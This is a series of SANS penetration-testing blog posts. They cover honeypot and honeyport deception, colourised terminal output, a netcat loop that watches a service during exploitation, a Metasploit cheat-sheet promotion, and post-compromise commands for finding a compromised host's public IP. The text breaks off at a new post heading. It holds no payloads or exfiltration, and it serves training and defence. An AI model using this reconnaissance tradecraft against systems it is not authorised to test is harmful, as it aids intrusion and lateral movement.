Opening a Can of Active Defense and Cyber Deception to Confuse and Frustrate Attackers

 

opening01

As Cybersecurity/Infosec Professionals we know that all you have to do is wait 30 seconds and someone else has been breached and two new vulnerabilities have been discovered (hypothetically of course). There are few jobs on Earth that see the constantly evolving challenges that we get the privilege to deal with. This constant state of flux and learning has been what has kept me interested in this field as there are no shortages of challenges to counter. With an ever-growing list of Nation State attackers, organized criminals, hacktivist groups, and every other threat out there, no organization is safe. When you look across all industries in the private sector as well as government organizations at all levels, we are all getting attacked constantly.

opening02

Definitions

Active Defense: Any defensive activity that is not simply installing a product or waiting for an IDS/firewall alert

- Proactive and anticipatory (hunt teaming, software restriction polices, and Internet whitelisting)

Cyber Deception: The deliberate and calculated process of deceiving attackers in an effort to wage a better defense (“Honey” things placed in your network which wouldn’t normally be accessed)

“All warfare is based on deception. There is no place where espionage is not used. 
Offer the enemy bait to lure him.” ~Sun Tzu”

 

Disclaimer

  • The tactics covered here are meant to augment existing defensive techniques and technologies; not replace them
  • Before employing these tactics, you must make sure you have the ability to ingest and analyze the additional alerts that could arise
  • Make sure you vet all tactics with your legal team, human resources, and upper management first

 

Reducing Blind Spots in your Network

Many organizations today have solid defensive capabilities and monitoring at their network boundary, but once an attacker is within the network their activities and movements they often go unnoticed. One of the goals of implementing Active Defense and Cyber Deception is to reduce blind spots within the network by essentially setting up virtual trip-wires within the network. More specifically, it involves strategically deploying honeypots, honeyports, and honeyobjects. These “honey” things serve no legitimate purpose, so anytime they are interacted with it needs to be investigated. The tools and tactics that I am covering in this post utilize built-in capabilities within the operating system or free open-source software.

There are a few key things to keep in mind as you deploy a honeypot, honeyport, or any form of honeyobject. First anything you deploy should be done in such a way that it is believable, and secondly, you must ensure that you can receive alerts when the honeypot, honeyport, or honeyobject is interacted with. By doing these things you will greatly increase your chances of identifying anomalous activity within the lower areas of your network.

In addition to these capabilities custom IDS signatures should be created to identify unique strings or port access across your network. With this in mind, let’s look at a couple common honeypots in use today.

The goal of all Active Defense and Cyber Deception techniques is to disrupt the attack cycle to give defenders a better chance of early detection. The earlier in the attack cycle we detect anomalous/malicious activity, the greater our chances of stopping an attacker from establishing long term persistence and/or exfiltrating sensitive data.

opening03

 

Honeypots

There are many different honeypots available today both in the open-source and commercial software arenas. There is definitely no one-size fits-all solution out there. With this being said, I am going to cover two common open-source honeypots that have very specialized functions. The two that I am going to discuss here are Dionaea and Conpot. Dionaea is a honeypot that is focused on malware collection, but is also capable of logging information pertaining to server-side attacks. Conpot is a ICS/SCADA honeypot that is able to mimic a wide variety of different control systems.

I chose these two honeypots to discuss because they provide an excellent example of why you should not deploy a honeypot in its default configuration, and you must put some thought into how and where the system is deployed.

 

Dionaea

One of the first steps most attackers are going to take will be to scan your environment to identify the systems and services available within your network. For this example I have deployed Dionaea in its default configuration and have run a nmap service scan against the system. As you can see in the scan results below, there are three ports that have services being identified as Dionaea honeypot.

opening04

If an attacker was to discover this they will likely change their tactics to be more careful and they will definitely avoid this system. As defenders we don’t want any type of active defense measure to be able to be identified this easily; so we should investigate the tool prior to deploying it and try to make some subtle modifications to help avoid detection. This is essentially the same thing attackers do by utilizing measures to avoid detection of A/V, IDS, and other traditional defense products.

To help avoid easy detection of the Dionaea honeypot I needed to find out what nmap was using to fingerprint these services. I started doing the research and code analysis to determine this, but during the course of my investigation I discovered that Jose Manuel Fernandez had already done this research and had published it on securityartwork.es.

When nmap is working to fingerprint a service, it simply compares the strings coming back to it against the nmap-service-probes file, which contains a listing of known strings along with their corresponding service identifier. To help Dionaea avoid detection by nmap, we simply need to change the strings that it is sending in response to the probes sent by nmap. As I stated earlier, we want to make sure that this is believable, so we want to pick service fingerprints that make sense for our environment and ideally aren’t too far out of date.

For the FTP service I did a little research on vulnerable FTP services that were relatively current. In addition to making the service current, I also wanted to find a vulnerable FTP service, so I did some research on the https://www.cvedetails.com/ site; and chose to mimic VsFTPD 3.0.2.

opening05

To make the changes for Dionaea’s responses I had to modify the ftp.py script being used for the service. The exact location will vary depending on where you install, but for my instance it was located in

/opt/Dionaea/lib/Dionaea/python/dionaea/ftp.py

 

Once I opened the ftp.py file in a text editor, I needed to find the string being used to fingerprint it, which is highlighted below.

opening06

To complete the modifications, I updated the SMB and MSSQL files so that they wouldn’t match the nmap-service-profiles definitions for the SMB and MSSQL services as shown below.

 

SMB

/opt/Dionaea/lib/Dionaea/python/dionaea/smb/include/smbfields.py

opening07
MSSQL

/opt/Dionaea/lib/Dionaea/python/dionaea/mssql/mssql.py

opening08

 

Once all of these changes were complete and the Dionaea honeypot was restarted, you can see that the scan results no longer scream “I’m a Honeypot!

opening09

Conpot

Conpot is a low interactive server side Industrial Control Systems honeypot designed to be easy to deploy, modify and extend to mimic a wide variety of devices/infrastructures. There has been some interesting research on Conpot with regards to its default configuration and deployment. Specifically, Darren Martyn documented a significant amount of data for Conpot on http://xiphosresearch.com/2015/12/09/OPSEC-For-Honeypots.html.

Conpot can be easily identified by a series of default values set within its configuration file simply named default.xml. On my installation it is located here:

/honeydrive/conpot/conpot/templates/default.xml

 

Below are two excerpts from the default.xml file with specific values pointed out that can be used to identify the presence of Conpot.

opening10

opening11

With these values in mind, I went to Shodan to demonstrate how you can do a search on these values and get quite a few responses back. In the graphic below, you can see that I did a search on the device serial number and got back 206 results. If you take a look at the results you can see that they all have the same Module Type, Module name, and serial number. Additionally, if you were to run this same search in Shodan, you will find a number of these Conpot systems hosted by Cloud based providers. This ties in with my earlier statement on deploying systems in a way that is believable. You should not see ICS systems running in the cloud! Could it happen, sure, you could theoretically virtualize a PLC and host it in the cloud, but just because you can, doesn’t necessarily mean you should.

opening12

From this result, I picked one IP and did another search in Shodan’s experimental site Honeyscore to see if the IP could be identified as a honeypot. As you can see in the following graphic, Honeyscore identified the IP 196.203.222.179 as a honeypot.

opening13

 

Honeyports

As an alternative to deploying full honeypot systems, we can always stand-up a handful of decoy ports that serve no legitimate purpose. Personally, honeyports are something I believe are best used within your network and should mimic services that attackers will use to move laterally. They can be extended well beyond this of course, and their implementation is only limited by the creativity of the defender. There are numerous FREE tools and methods available for honeyports, so it is recommended to try a few and see what works best for your environment. A few examples are:

  • Honeyports python script by Paul Asadorian: https://github.com/ethack/honeyports/blob/master/honeyports-0.4a.py
    • Honeyports.py is a simply python script that will establish a set of honeyports, monitor for connections, and automatically enter firewall block rules to block attacker IPs from connecting to the system again.
  • Artillery by Dave Kennedy: https://www.trustedsec.com/artillery/
    • Artillery is an open source project aimed at the detection of early warning indicators and attacks. The concept is that Artillery will spawn multiple ports on a system giving the attacker the idea that multiple ports are exposed. Additionally, Artillery actively monitors the filesystem for changes, brute force attacks, and other indicators of compromise. Artillery is a full suite for protection against attack on Linux and Windows based devices. It can be used as an early warning indicator of attackers on your network. Additionally, Artillery integrates into threat intelligence feeds which can notify when a previously seen attacker IP address has been identified. Artillery supports multiple configuration types, different versions of Linux, and can be deployed across multiple systems and events sent centrally.

Or, we can simply use some good old fashioned command-line kung-fu to accomplish the same thing. Just like with the above-mentioned tools, the goal is to have a port or ports which will show up in port scan results that are not meant for a legitimate purpose. When anyone interacts with them it is automatically considered suspicious, and a firewall block is put in place. When setting up a honeyport, remember that it should mimic a vulnerable service or one that an attacker would use to move laterally.

On Windows XP and later, we can set-up a Windows batch file to set-up our honeyport and to automatically create a firewall rule if it is accessed. In the example below, the firewall syntax is for Window 7 and above, but it could be changed to simply use the netsh firewall command if you were using this on an XP machine.

To make this work, we would simply enter the commands below into a .bat file and set it to run on system start.

opening14

You will want to ensure that you are logging firewall events, and you can then set to forward and monitor for Event ID’s 2002 & 2010. Event ID 2002, indicates that firewall rules were changed, and Event ID 2010 indicates that the network profile has been changed. In situations where we are deploying honeyports or honeyobjects, we really need to be forwarding logs to a central log management server and monitoring from there.

An example of how this could be deployed, would be for us to set-up a Honeyport on TCP port 5900 to mimic a listening VNC server across many, or even all systems in the network. Legitimate users should never touch this, but it would be an attractive port to an attacker seeking to move laterally throughout the network. When the attacker attempts to access the port, they are blocked and the event gets logged. The way this would look on the local event viewer is shown in the graphic below.

opening15

Honeyobjects

The goal with a honeyobject is to simply have some files or folders in a place where typical users are never going to access them, and if someone does it would be deemed suspicious. For files and folders being used as a honeyobject, you could apply the hidden attribute to help ensure that casual users don’t interact with them. Once the honey file/folder is created, you will need to have object access auditing enabled. For an example, I created the following scenario:

1. Established object auditing on the C:\Users\zander\Wicked Stuff directory
2. Applied hidden attribute, so that an average user won’t know the file is there

To enable object auditing you need to do the following:

Step 1: From the Security Policy Editor, Select Local Policy > Audit Policy > Audit Object Access > Select success & failure

opening16

Step 2: Go into Advanced properties for the folder you want to monitor

opening17

Step 3: Select Auditing Tab

opening18

Step 4: Add the user accounts you want to track usage for

opening19

Once this was completed, I ran a recursive directory listing in the same fashion that a bad guy would comb your file system looking for interesting files.

opening20

The result will be a number of entries in the Security log under Event ID 4663.

opening21

 

Conclusion

Active Defense and Cyber Deception capabilities provide a serious force multiplier for those trying to defend their networks. Determined attackers will find a way in, and you must be able to detect them once they do. Incident response is not an if it is going to happen situation, it is a when. Everyone is a target, and statistics show that attackers definitely have the advantage in this fight. Active Defense and Cyber Deception techniques can help you disrupt the attack cycle to disrupt and frustrate attacker activities. The tools and techniques discussed above are not meant to replace anything, they are meant to augment your existing defense capabilities. When deployed strategically and methodically they can greatly increase your chances of detection thereby reducing attacker dwell time within your environment. Take your network back!

I am teaching SEC504: Hacker Tools, Techniques, Exploits, and Incident Handling  at many events in 2018 and 2019.

Chris Pizor, SANS Certified Instructor
https://www.sans.org/instructors/chris-pizor
chris.pizor@gmail.com
@chris_pizor

Upcoming SANS Special Event – 2018 Holiday Hack Challenge

KringleCon

SANS Holiday Hack Challenge – KringleCon 2018

  • Free SANS Online Capture-the-Flag Challenge
  • Our annual gift to the entire Information Security Industry
  • Designed for novice to advanced InfoSec professionals
  • Fun for the whole family!!
  • Build and hone your skills in a fun and festive roleplaying like video game, by the makers of SANS NetWars
  • Learn more: www.kringlecon.com
  • Play previous versions from free 24/7/365: www.holidayhackchallenge.com

Player Feedback!

  • “On to level 4 of the #holidayhackchallenge. Thanks again @edskoudis / @SANSPenTest team.” – @mikehodges
  • “#SANSHolidayHack Confession – I have never used python or scapy before. I got started with both today because of this game! Yay!” – @tww2b
  • “Happiness is watching my 12 yo meet @edskoudis at the end of #SANSHolidayHack quest. Now the gnomes #ProudHackerPapa” – @dnlongen
kringle_02

Pen Test Poster: “White Board” – Bash – Make Output Easier to Read

Board Elements_clean_Make Output Easier to Read

By Matthew Toussain, Geoff Pamerleau

Data! DATA!! DATA!!! So much data… an endlessly grueling component of every information security practitioner’s job description is data analysis. Often, digging through an environment for vulnerabilities or configuration flaws involves scrounging through reams of log data. It is not uncommon to find your eyes glazing over while staring at giant walls of text on plain backgrounds and contemplating how exactly your life choices have landed you… here. What could make your gray text on black background daydreams better? Rainbows of course!

makeoutput_easier01

Getting pygmentize…

Wait, what? That’s right, pygmentize is not a part of the standard build for most Linux operating systems you need to install it first. Kali Linux is an exception to this rule and is generally packaged with pygmentize included out of the box. On Linux distributions in the Debian family (Ubuntu, Kali, Raspbian, TAILS) pygmentize can be installed like this:

sudo apt-get install python-pygments

 

Methods Covered in this Section

pygmentize specifying theming:

pygmentize -O bg=dark,style=colorful /path/to/file

pygmentize files without a specified file extension (and optional piping to less)

pygmentize -g /path/to/file | less -R

 

Pygments is a generic syntax highlighter suitable for use in code hosting, forums, wikis or other applications that need to prettify source code. Highlights are:

  • a wide range of over 300 languages and other text formats is supported
  • special attention is paid to details that increase highlighting quality
  • support for new languages and formats are added easily; most languages use a simple regex-based lexing mechanism
  • a number of output formats is available, among them HTML, RTF, LaTeX and ANSI sequences
  • it is usable as a command-line tool and as a library
  • … and it highlights even Perl 6!

From the pygments home page: http://pygments.org

Using pygmentize is very straightforward:

 

makeoutput_easier02Normal. Drab. Bash.

makeoutput_easier03PYGMENTIZE!

 

Pygmentize adds a splash of color with a single command!

 

To make pygmentize even less cumbersome we can add the following alias for “color cat” to our .bashrc:

 

alias ccat='pygmentize -O bg=dark,style=colorful'

NOTE: If you use a light colored terminal background try bg=light for easier readability

 

Now for colorful cat output we just need to run ccat.

makeoutput_easier04

 

As you can see in the above output chain ccat is quite handsome! Until it is not… Sometimes when running pygmentize you might see the following error:

makeoutput_easier05#fail

 

To solve this error we just need to add the -g (guess) flag. The guess flag will attempt to use the contents of the file to guess how syntax highlighting should be performed.

makeoutput_easier06Not perfect but at least it’s colorful

 

The last pygmentize tidbit is how to colorize files that are too large to see the contents all at once (the previous /etc/passwd file for example). Normally, this can be handled by piping the command output into less:

ccat -g /etc/passwd | less

makeoutput_easier07Well that’s… interesting

 

The ANSI color escape sequences used by pygmentize are lost when less tries to print them out. In order to work around this we can use the -R flag to preserve raw control characters.

ccat -g /etc/passwd | less -R

makeoutput_easier08Much better

 

Conclusion

While pygmentize doesn’t functionally add much to our pentesting tool belt it is a simple way to make working with text files a bit less drab and perhaps somewhat more fabulous!

Matthew Toussain
https://twitter.com/0sm0s1z

 

Upcoming SANS Special Event – 2018 Holiday Hack Challenge

KringleCon

SANS Holiday Hack Challenge – KringleCon 2018

  • Free SANS Online Capture-the-Flag Challenge
  • Our annual gift to the entire Information Security Industry
  • Designed for novice to advanced InfoSec professionals
  • Fun for the whole family!!
  • Build and hone your skills in a fun and festive roleplaying like video game, by the makers of SANS NetWars
  • Learn more: www.kringlecon.com
  • Play previous versions from free 24/7/365: www.holidayhackchallenge.com

Player Feedback!

  • “On to level 4 of the #holidayhackchallenge. Thanks again @edskoudis / @SANSPenTest team.” – @mikehodges
  • “#SANSHolidayHack Confession – I have never used python or scapy before. I got started with both today because of this game! Yay!” – @tww2b
  • “Happiness is watching my 12 yo meet @edskoudis at the end of #SANSHolidayHack quest. Now the gnomes #ProudHackerPapa” – @dnlongen
kringle_02

Pen Test Poster: “White Board” – Bash – Check Service Every Second

 

Board Elements_clean_Check Service Every Second

By Matthew Toussain & Geoff Pamerleau

 

If you’ve had the opportunity to take SANS 560, Network Penetration Testing and Ethical Hacking, chances are you were exposed to the Pentester’s Pledge. The pledge, for those who aren’t familiar is:

“I , do hereby pledge to use psexec to exploit Windows target machines after I have gained admin credentials and SMB access to the target environment. I shall forsake other service-side exploits thereafter. Otherwise, I unnecessarily risk crashing target systems”.

As penetration testers, we have been endowed with the unalienable right to own all the systems (within our scope and rules of engagement of course). Cereal Killer, a whimsical character in the 1995 Hackers film, sums it up best during one of his ecclesiastical moments of clarity: “Listen, we got a higher purpose here, alright? A wake up call for the Nintendo Generation. We demand free access to data, well, it comes with some responsibility.”

This responsibility is simple and it is not unique to our industry. Consider the Hippocratic Oath, which belies the medical principle of primum non nocere (do no harm). Like doctors, information security practitioners should perform with the lightest of touches. A heavy handed approach to security assessments, can lead to dire consequences side effects of pentest may include drowsy computers, frantic IT department parents, and in some cases death. Death! Yes, death, that eternal bit bucket where Google projects go to die in their hundreds. That means instead of breaking down doors with exploits, consider using the keys, after you’ve stolen them first of course!

In the end, though, light touches may not always be enough. When it comes to preventing a headache from escalating into a full blown migraine, vigilance is key. The sooner we can identify an unfortunate outage; the more quickly we can work with our clients to minimize any potential damage. Now, let’s examine a few methods to bake rapid response actions into the penetration tester’s toolkit.
check01

Methods Covered in this Section:

Check service heartbeat:

nc -vv -z -w3 192.168.86.151

Check service every second bash loop:

while (true); do nc -vv -z -w3 10.0.0.1 80 >/dev/null && echo -e “Service is up”; sleep 1; done

Service UP/DOWN bash loop via OR:

while (true); do nc -vv -z -w3 10.0.0.1 80 2>/dev/null && echo -e SERVICE UP || echo -e SERVICE DOWN; sleep 1; done

 

Checking the Pulse

If the end goal is to have bash notify us the moment a service goes down, the first step is to figure out how to tell if it is up vs down. One of the easiest ways for us to check its status is to simply connect to it with a nc. Assuming that we’re planning on exploiting a target located at 192.168.86.151 on port 445, we could run the following to see that the service is still up:

Check service heartbeat:
nc -vv -z -w3 192.168.86.151 445

If the service is up we would see something like:

check01a

 

Command Breakdown

nc -vv -z -w3 192.168.86.151 445

1. nc - netcat is a tool that makes tcp connections given IP and PORT
 2. -vv - Print output in double verbose mode
 3. -z - execute in zero I/O mode. Without the -z option our nc connection to the victim machine on 445 would wait for input from the user, using the -z simply terminates the connection once it is established without sending any data.
 4. -w3 - Set connect timeout to 3s
 5. 192.168.86.151 145 - Destination IP PORT

While the above command could be run repeatedly (manually) to check the status of the service before, during, and after each exploitation attempt it would be easier to wrap the whole thing in one big bash while loop.
while (true); do…

Doing or checking something over and over again, endlessly sounds like a gloomy task for a person, but it suits computers just fine. Scripting languages like bash exist to help us solve a problem once and never worry about it again. The key to accomplishing this is often repetition. In computer logic, a loop allows us to do something over and over until a certain condition has been met. But what happens if we give the loop a condition that never proves true? In bash we can achieve infinite repetition like this:

check02

1 is always less than 2 (-le) so the script will forever print “Hello World”

 

To make this more straightforward we can use something called a boolean operator. In this case, the word true will do. We can also run the entire thing on one line using the command separator: ;

check03

Other operators we could use to build an infinite loop include: while : and while (true). Effectively, our template for running “things” is:

while true; do [thing]; [thing]; [thing]; done

 

Putting this all together gives us a powerful bash one-liner like this:

Check service every second bash loop:
while (true); do nc -vv -z -w3 10.0.0.1 80 >/dev/null && echo -e “Service is up”; sleep 1; done

check04

As you can see the nc connection attempt responds with “Connection refused” as soon as the service, in this case a webserver, goes down.

 

Command Breakdown

while (true); do nc -vv -z -w3 10.0.0.1 80 >/dev/null && echo -e “Service is up”; sleep 1; done

1. while (true) - Begin the infinite loop
2. do nc -vv -z -w3 10.0.0.1 80 - Check service status
3. >/dev/null && echo -e - Suppress connection output and echo success to stdout
4. sleep 1 - Pause for 1 second before moving on
5. done - Finish the loop, and start back at the beginning

 

Success && || (and/or) Failure

For cleaner output we could suppress the output of the connection test and echo status messages based off of whether the last command was successful. Adding on the || (OR) operator allows us to make the service respond in a customizable fashion when the connection is refused:

Service UP/DOWN bash loop via OR:
while (true); do nc -vv -z -w3 10.0.0.1 80 2>/dev/null && echo -e SERVICE UP || echo -e SERVICE DOWN; sleep 1; done

check05

Command Breakdown

while (true); do nc -vv -z -w3 localhost 80 2>/dev/null && echo -e SERVICE UP || echo -e SERVICE DOWN; sleep 1; done

1. while (true)...SERVICE UP - See previous command breakdown
2. do nc -vv -z -w3 10.0.0.1 80 - Check service status
3. || - The && operator means: “run the following if the previous executed successfully” || executes if it did not (connection refused)

 

Bonus – Leveraging the Environment

What if checking a service’s status is not as simple as port UP/DOWN? Emily Cole (@unixgeekem) has some additional advice on the subject. Specifically, leverage the environment to gather additional telemetry on what may be going on. Techniques like tail -f against server logs or direct monitoring of syslogs and SEIM data can provide extra situational awareness. Occasionally, you may already have this access through past exploitation, but in the case of highly sensitive or production systems consider working with the host organization to have this access included in the rules of engagement up front. This might feel like giving away the keys, but remember: primum non nocere.

Matthew Toussain
https://twitter.com/0sm0s1z

 

Upcoming SANS Special Event – 2018 Holiday Hack Challenge

KringleCon

SANS Holiday Hack Challenge – KringleCon 2018

  • Free SANS Online Capture-the-Flag Challenge
  • Our annual gift to the entire Information Security Industry
  • Designed for novice to advanced InfoSec professionals
  • Fun for the whole family!!
  • Build and hone your skills in a fun and festive roleplaying like video game, by the makers of SANS NetWars
  • Learn more: www.kringlecon.com
  • Play previous versions from free 24/7/365: www.holidayhackchallenge.com

Player Feedback!

  • “On to level 4 of the #holidayhackchallenge. Thanks again @edskoudis / @SANSPenTest team.” – @mikehodges
  • “#SANSHolidayHack Confession – I have never used python or scapy before. I got started with both today because of this game! Yay!” – @tww2b
  • “Happiness is watching my 12 yo meet @edskoudis at the end of #SANSHolidayHack quest. Now the gnomes #ProudHackerPapa” – @dnlongen
kringle_02

 

SANS Pen Test Cheat Sheet: Metasploit

For the longest time we haven’t had a proper blog post for our Metasploit Cheat Sheet. This is one of our most popular cheat sheets. It was created by Ed Skoudis and his team.

When we attend BSides and conferences like DerbyCon and ShmooCon we bring a ton of printed copies with us and give them out at the booth and attendees always grab a bunch for themselves and for friends back at the office. But, in case you can’t make it to a local conference we are sponsoring, we’re making it available online for you to download, print, and share.

Did you know that we teach Metasploit in our core SANS Pen Testing Course, SEC560: Network Penetration Testing and Ethical Hacking and in our newly revised and updated 2-day hands-on SEC580: Metasploit Kung Fu for Enterprise Pen Testing?

Oh… we just made something that we think is pretty nifty. Here is a desktop wallpaper, in multiple sizes, based on the Metasploit Cheat Sheet for you to download and use.

(Click on the image for full-sized version to download)

Metasploit_1280x1024Metasploit_1280x1024
Metasploit_1920x1080Metasploit_1920x1080
Metasploit_5120x2880Metasploit_5120x2880

Download the 2-Page, PDF, Printable Version of Metasploit Cheat Sheet

Metasploit_CheatSheetPage_LARGE

Download: MetasploitCheatsheet2.0

Pen Test Cheat Sheets:

SANS Pen Test Training:

Upcoming SANS Special Event – 2018 Holiday Hack Challenge

KringleCon

SANS Holiday Hack Challenge – KringleCon 2018

  • Free SANS Online Capture-the-Flag Challenge
  • Our annual gift to the entire Information Security Industry
  • Designed for novice to advanced InfoSec professionals
  • Fun for the whole family!!
  • Build and hone your skills in a fun and festive roleplaying like video game, by the makers of SANS NetWars
  • Learn more: www.kringlecon.com
  • Play previous versions from free 24/7/365: www.holidayhackchallenge.com

Player Feedback!

  • “On to level 4 of the #holidayhackchallenge. Thanks again @edskoudis / @SANSPenTest team.” – @mikehodges
  • “#SANSHolidayHack Confession – I have never used python or scapy before. I got started with both today because of this game! Yay!” – @tww2b
  • “Happiness is watching my 12 yo meet @edskoudis at the end of #SANSHolidayHack quest. Now the gnomes #ProudHackerPapa” – @dnlongen
kringle_02

SANS Penetration Testing: Command Line Kung-Fu – Desktop Wallpapers

PenTest_WhiteBoard_Back_Preview

SANS Pen Test: Command Line Kung-Fu

Desktop Wallpapers

So… we made our new SANS Pen Test Poster: “White Board of Awesome Command Line Kung-Fu” and posted it on Twitter for some initial feedback and  someone asked us if we could turn it into a desktop wallpaper and we thought, “that’s a really cool idea!”

But, we created it and everything on it was too small and although it looked cool, it wasn’t functional. So, then we thought, what if we broke it up into individual pieces. “Eureka!” we exclaimed as we contacted our graphic designer with a new request.

Now… “BEHOLD!”

Introducing the first of many SANS Pen Test Curriculum Desktop Wallpapers!

(Click on the image for the full-sized version)

BASH_1280x1024BASH_1280x1024
BASH_1920x1080BASH_1920x1080
BASH_5120x2880BASH_5120x2880
Powershell_1280x1024Powershell_1280x1024
Powershell_1920x1080Powershell_1920x1080
Powershell_5120x2880Powershell_5120x2880
Python_1280x1024Python_1280x1024
Python_1920x1080Python_1920x1080
Python_5120x2880Python_5120x2880

 

Comment below if you have ideas for future SANS Penetration Testing Curriculum – Desktop Wallpapers we should make.

Thanks!

 

Pen Test Cheat Sheets:

SANS Pen Test Training:

Upcoming SANS Special Event – 2018 Holiday Hack Challenge

KringleCon

SANS Holiday Hack Challenge – KringleCon 2018

  • Free SANS Online Capture-the-Flag Challenge
  • Our annual gift to the entire Information Security Industry
  • Designed for novice to advanced InfoSec professionals
  • Fun for the whole family!!
  • Build and hone your skills in a fun and festive roleplaying like video game, by the makers of SANS NetWars
  • Learn more: www.kringlecon.com
  • Play previous versions from free 24/7/365: www.holidayhackchallenge.com

Player Feedback!

  • “On to level 4 of the #holidayhackchallenge. Thanks again @edskoudis / @SANSPenTest team.” – @mikehodges
  • “#SANSHolidayHack Confession – I have never used python or scapy before. I got started with both today because of this game! Yay!” – @tww2b
  • “Happiness is watching my 12 yo meet @edskoudis at the end of #SANSHolidayHack quest. Now the gnomes #ProudHackerPapa” – @dnlongen
kringle_02

Pen Test Poster: “White Board” – Bash – What’s My Public IP Address?

Board Elements_clean_WhatGÇÖs My Public IP address-

By Matthew Toussain, Geoff Pamerleau

 

Introduction

After hours of digging, you finally reach your goal and exclaim, “I GOT SHELL!”  You brush the dirt off your shoulders and suddenly wonder, “Now what?” Fortunately, if it’s a Unix system, we can leverage the rich functionality that comes with Bash in order to move our pentest along whilst maintaining our shadowy veil.

Let’s first take a moment to evaluate a few potential use cases. The system’s external IP address is often a key piece of information for us to consider. It can help us continually appraise our intrusion campaign to maintain awareness of what systems become compromised so that we remain within the narrow scope of our test. Alternately, we might launch an attack against a DNS name that resolves to multiple host IP addresses on the far end and we need to determine which specific IP address we’ve compromised in order to leverage that access to move laterally within the target environment. Why not just check the IP address assigned to the network interface? As penetration testers most systems we engage live behind a firewall in a Network Address Translation, or NAT environment. In these situations a system’s internal IP address may not accurately reflect how they appear on the Internet. Either way, determining ‘where’ this box is a solid first step in any post-compromise scenario. Let’s look at the some common ways to get this info.

 

Methods Covered in this Section

curl: curl -4 icanhazip.com

wget: wget -qO- ifconfig.me/ip

dig: dig +short myip.opendns.com @resolver1.opendns.com

telnet: telnet myip.gelma.net

telnet + nc:

nc -vlp 9000
telnet [hostname/IP Address] 9000

telnet web client:

telnet ipecho.net 80
GET /plain HTTP/1.1
HOST: ipecho.net

ftp: echo close | ftp ifcfg.me

PowerShell: Invoke-RestMethod http://ipinfo.io/json | Select -exp ip

 

whatsmyip_01

So many options…

For a typical user learning their public IP address is often as simple as a Google search for: ‘what’s my IP’. For us this might also be a viable option however, as pentesters, we’re often confronted with terminal access as opposed to a graphical user interface and web browser. It might seem like a limitation, but with Bash, there is no such thing! There are tons of different utilities that can reach out and get the info we’re interested in. Let’s begin by targeting the simplest and most effective options:

  • IP identification with command line web access utilities
    • curl
    • wget
  • Using DNS to determine our IP address
    • dig

Command Line HTTP External IP Identification

On differentiated Unix type operating systems there are generally two major command line utilities for downloading the content of websites: curl and wget. Depending on which specific flavor is used (e.g. Mac OSX, Ubuntu, etc.), only one or potentially both will be available. For continuity’s sake we’ll discuss both:

 

Command Breakdown

curl: curl -4 icanhazip.com

whatsmyip_02

1. curl - Command line tool that can make web request
2. -4 - Option for curl to prefer IPv4 addresses over IPv6 for domain resolution
3. icanhazip.com - Public domain that returns an IP address when queried

 

Command Breakdown

wget: wget -qO- ifconfig.me/ip

whatsmyip_03

  1. 1. wget - Command line tool that can make web request
  2. 2. -q - Option for wget to run in quiet mode suppressing status output
  3. 3. -O - Option for output - specifies stdout as the output type (O not zero)
  4. 4. ifconfig.co/ip - Public domain that returns an IP address when queried

Occasionally, arbitrary outbound http access is not available. For instance, a network that requires authentication to join could use network access controls (NAC) to redirect all unauthenticated web traffic to a captive portal. Networks using authenticated proxies or whitelisting controls can also provide egress challenges. In these situations outbound DNS traffic is often still required and therefore available. In these cases the dig command has got you covered!

 

Command Breakdown

dig: dig +short myip.opendns.com @resolver1.opendns.com

whatsmyip_04

1. dig - Command line tool for interrogating DNS name servers
2. +short - Option for dig to provide an abbreviated response
3. myip.opendns.com - Host to resolve
4. @resolver1.opendns.com - DNS server to query

 

whatsmyip_05

But wait, there’s more!

So what if curl, wget, and dig are all unavailable? Perhaps the network is blocking opendns.com, ifconfig.me, and icanhazip.com?

telnet and ftp can provide alternative, if clunky, solutions. telnet like nc can make TCP connections to any port specified. This can be used to connect to a server owned by you, to connect to a telnet public ip service (port 23), or connect to a web server as a client. telnet has the added benefit of working from Windows systems as well however, the command must be enabled in order to do so. Some ftp servers respond to failed login requests with the IP address that attempted and failed to connect. We can utilize this behavior to determine public IP address as well.

 

Command Breakdown

telnet: telnet myip.gelma.net

telnet myip.gelma.net
GET /plain HTTP/1.1
HOST: ipecho.net

whatsmyip_06

1. telnet myip.gelma.net - Connect to telnet service that responds with Public IP Address

 

Command Breakdown

telnet + nc:

nc -vlp 9000
telnet [hostname/IP Address] 9000

whatsmyip_07

1. nc -vlp 9000 - Run on your publicly available server to open a listening port
2. telnet [hostname/IP Address] 9000 - Connect to remote netcat listener

Netcat prints information on newly established connections to stdout (Connection from X.X.X.X)

 

Command Breakdown

telnet as a web client: telnet ipecho.net 80

telnet ipecho.net 80
GET /plain HTTP/1.1
HOST: ipecho.net

whatsmyip_08

1. telnet ipecho.net 80 - Connect to web server with telnet
2. GET /plain HTTP/1.1 - HTTP Protocol syntax for GET request
3. HOST: ipecho.net - HTTP Protocol HOST header

 

ftp: echo close | ftp ifcfg.me
whatsmyip_09

 

Bonus

We’ve beaten the proverbial Linux horse to death, but what about Windows? As a bonus, here’s an option in PowerShell: Invoke-RestMethod http://ipinfo.io/json | Select -exp ip

 

Conclusion

There are tons of different ways this task can be accomplished and many different tools at your disposal to do so. If you have a favorite or unique take on determining the public IP address of a Linux system from the command line please share in the comments below!

Matthew Toussain
https://twitter.com/0sm0s1z

 

Upcoming SANS Special Event – 2018 Holiday Hack Challenge

KringleCon

SANS Holiday Hack Challenge – KringleCon 2018

  • Free SANS Online Capture-the-Flag Challenge
  • Our annual gift to the entire Information Security Industry
  • Designed for novice to advanced InfoSec professionals
  • Fun for the whole family!!
  • Build and hone your skills in a fun and festive roleplaying like video game, by the makers of SANS NetWars
  • Learn more: www.kringlecon.com
  • Play previous versions from free 24/7/365: www.holidayhackchallenge.com

Player Feedback!

  • “On to level 4 of the #holidayhackchallenge. Thanks again @edskoudis / @SANSPenTest team.” – @mikehodges
  • “#SANSHolidayHack Confession – I have never used python or scapy before. I got started with both today because of this game! Yay!” – @tww2b
  • “Happiness is watching my 12 yo meet @edskoudis at the end of #SANSHolidayHack quest. Now the gnomes #ProudHackerPapa” – @dnlongen
kringle_02

Pen Test Poster: “White Board” – Bash – Bash’s Built-In Netcat Client

Board Elements_clean_BashGÇÖs Built-In Netcat Client

By Matthew Toussain, Geoff Pamerleau

Introduction

